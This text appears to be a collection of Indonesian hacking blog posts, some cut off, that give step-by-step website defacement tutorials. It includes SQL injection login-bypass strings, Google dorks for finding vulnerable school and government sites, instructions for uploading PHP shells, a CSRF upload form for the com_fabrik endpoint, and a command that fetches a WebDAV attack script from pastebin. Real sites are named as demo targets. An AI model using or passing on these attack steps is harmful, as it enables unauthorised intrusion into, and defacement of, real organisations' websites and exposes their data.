ingganinggra022

[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability [+]Author: Negat1ve [+]Team: -1 [+]Goolge Dork: intext:"ISPROJEK" [+]Tested on: Windows 10 x64 ============================================ [+]Proof Of Concept: Find website with the dork Login url will be site.sch.id/path/login.php Login with this detail user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ You can upload your file via 1. Click Setting or you can paste the link /index.php?p=f_editadmin 2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1 3. Fill all the form, then upload your Shell (php extension) in the "File Logo" Your files will go to site.sch.id/path/images/logo/yourshell.php example: https://aplikasi-cbt.com/ppdb/images/logo/captcha.php NB: - filetype of this uploader is php - Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data Demo site...

[+]Exploit Title: SIMPONIE v2.3 Indonesia Government Responsive File Manager File Upload [+]Author: Negat1ve [+]Team: -1 [+]Goolge Dork: intext:"SIMPONIE v2.3" [+]Tested on: Windows 10 x64 ================================================ [+]Proof Of Concept: Find website with the dork Login url will be site.go.id/panel/login Login with this detail user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ You can upload your file via Responsive Drag And Drop File in "Berkas Unggahan" Your files will go to site.go.id/fm/rc/random hash/yourfilename.jpg example: https://simponie2.lebakkab.go.id/…/988e396409f2ac…/loser.jpg NB: - filetype of this uploader is jpg jpeg png Demo sites: https://simponie2.lebakkab.go.id/panel/login http://simponie.serangkab.go.id/panel/login https://simponie.tangerangselatankota.go.id/panel/login Catatan:  Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat,  Jika ada masalah jangan pernah menyalakan website in...

Assalamualaikum Wr.Wb       Kali ini saya akan share tutor Deface Dengan Bypass Admin, saya orangnya gak suka basa-basi karena nanti terlalu lama malah ditikung orang seperti dulu.... malah curhat:v. langsung saja ke tutorial Bahan : 1. Dork (Ada di bawah ). 2. Shell Extensi .php.pjpeg atau php.xxxjpg 3. Kesabaran :)  Dork :     inurl:/admin.php intext:login intext:adminsitrator     inurl:/admin/index.php intext:username     inurl :/admin/Admin.php intext:login     inurl:/administrator/login.php intext:username site:.     inurl:/login.php intext:administrator intext:login Langsung, perhatikan tutorial di bawah ya 1. Dorking ke google.  Misal gw pake dork:     inurl :/admin/Admin.php intext:login 2. Pilih salah satu website. 3. Isi username + pass dengan     '=''or' 4.  Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.      Jika login gagal, ca...

Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Terimakasih telah berkunjung ke web kurang sempurna ini. Kali ini saya akan memberikan Deface Metode Dorking Shell. Alat dan bahan yang harus di siapkan -Script Deface Kalian -Dork intitle:"IndoXploit" filetype:php intitle:"IndoXploit" intext:"public_html" filetype:php intitle:"IndoXploit" intext:"mass deface" filetype:php intitle:"IndoXploit" intext:"mass delete" filetype:php intitle:"IndoXploit" intext:"jumping" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"fake root" filetype:php intitle:"IndoXploit" intext:"auto edit user" filetype:php intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php intitle:"IndoXploit" intext:"...

Assalamualaikum Wr.Wb Baiklah bertemu lagi, kali ini saya akan share tutor Deface Metode Com_fabrik With CSRF. Bahan: -Script Deface (Saya rasa udah punya sendiri-sendiri) -Dork -CSRF Dork: Inurl:index.php?Option=Com_Fabrik -Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload -CSRF Bisa download  Disini    <title>CSRF Com_fabrik</title><br> <h1><font size="10">CSRF Com_Fabrik by fadlankun</h1><br> <form method="POST" action="http://site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"enctype="multipart/form-data"> <input type="file" name="file"><button>Upload</button></form></center><br></font> Dork: Inurl:index.php?Option=Com_Fabrik Exploit: /index.php?option=com_fabrik&format=ra...

Assalamualaikum Wr.Wb Kali ini saya akan share tutor deface metode Com Media, langsung saja ke tutorial. Dork : inurl:com_media site:id Live Target : http://kemahasiswaan.unmuhjember.ac.id Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 1. Dorking dulu Buka salah satu websitenya.jika vuln tampilannya seperti ini, Lalu upload file berformat png,jpg,gif,txt Jika berhasil terupload tampilannya seperti ini. Lalu cari dan klik fotonya, Nanti akan muncul Image URL , Salin dan tempel dibelakang URL websitenya Contoh: http://kemahasiswaan.unmuhjember.ac.id /images/1535184779-picsay.png Dan tampilannya akan seperti ini Mungkin hanya itu yang saya bisa sampaikan mengenai Tutor Deface Metode Com Media. Sekian dan Terima kasih Jika kalian menyukai postingan ini, Silahkan bagikan kepada teman kalian. Wassalamualaikum Wr.Wb

Assalamualaikum Wr.Wb Kali ini saya akan share tutor deface webdav di android dengan termux. Deface webdav cocok untuk user android seperti saya, tapi ada kelemahannya yaitu gak bisa mass exploit... jadi harus satu persatu:( Langsung saja Download termux di playstore dulu Dork: inurl:webdav inurl:.com.x/*.asp inurl:.edu.x/*.asp inurl:.gov.x/*.asp Tutorial: 1. Buka termuxnya... ketik kode di bawah ini $ apt update && apt upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ mkdir webdav $ cd webdav $ wget https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ chmod 777 webdav.py 2. taruh script deface kalian di folder webdav tadi yang di buat Dan berikan hak akses termux untuk mengakses internal hp kalian $ termux-setup-storage pindahkan script deface kalian di penyimpanan folder webdav dengan root explorer di "/data/data/com.termux/files/home/webdav" atau kalian taruh script deface ka...

Assalamualaikum Wr.Wb Saya pertama kali akan share tutor deface metode kindeditor yang mudah di lakukan oleh pemula, langsung saja kita ke tutorial 1. Masukan Dorknya ke kotak pencarian Google : inurl:examples/uploadbutton.html inurl:kindeditor Pilih salah satu target yang ingin di deface Contoh: http://www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html 2. Kalo web target udah dapet, kita klik upload 3. Kemudian pilih SC defeca kalian, Contoh disini saya menggunakan fadlankun.html 4. Nanti akan keluar URL hasil upload-an HTML kita, copas link tersebut dan letakkan diakhir URL Contoh: http://target.com/(copas link tersebut) 5. Kemudian kalo sudah, tekan Enter. 6. Selesai Mungkin hanya itu yang saya bisa sampaikan mengenai Tutor Deface Metode KindEditor. Sekian dan Terima kasih Jika kalian menyukai postingan ini, Silahkan bagikan kepada teman kalian. Wassalamualaikum Wr.Wb